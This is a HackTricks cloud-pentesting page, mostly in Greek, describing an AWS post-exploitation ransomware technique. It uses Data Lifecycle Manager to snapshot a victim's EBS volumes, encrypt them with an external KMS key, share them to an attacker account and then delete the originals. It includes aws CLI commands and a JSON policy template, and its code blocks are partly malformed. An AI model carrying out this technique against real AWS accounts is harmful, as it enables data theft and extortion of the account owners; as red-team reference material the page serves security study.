AWS - DLM Post Exploitation

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Ερυθρού Συνεργείου HackTricks AWS)!

Άλλοι τρόποι υποστήριξης των HackTricks:

Αν θέλετε να δείτε την εταιρεία σας διαφημισμένη στα HackTricks ή να κατεβάσετε τα HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
Αποκτήστε το επίσημο PEASS & HackTricks swag
Ανακαλύψτε Την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα τηλεγράφου ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.

Διαχειριστής Κύκλου Δεδομένων (DLM)

`EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`

Μια επίθεση ransomware μπορεί να εκτελεστεί με τον κρυπτογράφηση όσων περισσότερων EBS όγκων γίνεται δυνατόν και στη συνέχεια διαγράφοντας τις τρέχουσες περιπτώσεις EC2, τους EBS όγκους και τις στιγμιότυπα. Για να αυτοματοποιηθεί αυτή η κακόβουλη δραστηριότητα, κάποιος μπορεί να χρησιμοποιήσει το Amazon DLM, κρυπτογραφώντας τα στιγμιότυπα με ένα κλειδί KMS από έναν άλλο λογαριασμό AWS και μεταφέροντας τα κρυπτογραφημένα στιγμιότυπα σε διαφορετικό λογαριασμό. Διαφορετικά, μπορεί να μεταφέρει στιγμιότυπα χωρίς κρυπτογράφηση σε έναν λογαριασμό που διαχειρίζεται και στη συνέχεια να τα κρυπτογραφήσει εκεί. Αν και δεν είναι απλό να κρυπτογραφήσετε απευθείας υπάρχοντες EBS όγκους ή στιγμιότυπα, είναι δυνατό να το κάνετε δημιουργώντας έναν νέο όγκο ή στιγμιότυπο.

Αρχικά, κάποιος θα χρησιμοποιήσει ένα πρόγραμμα για να συγκεντρώσει πληροφορίες σχετικά με τους όγκους, όπως το αναγνωριστικό περίπτωσης, το αναγνωριστικό όγκου, την κατάσταση κρυπτογράφησης, την κατάσταση σύνδεσης και τον τύπο όγκου. aws ec2 describe-volumes

Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.

```yaml
aws dlm create-lifecycle-policy --description "Η πρώτη μου πολιτική" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json


A template for the policy document can be seen here:
```bash
```json
{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "ΗμερήσιεςΛήψειςΣτιγμιότυπων",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "ΔημιουργόςΣτιγμιότυπου",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "ΚέντροΚόστους",
"Value": "Οικονομικά"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
}


<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

PreviousAWS - Control Tower Post Exploitation NextAWS - DynamoDB Post Exploitation

Last updated 2 months ago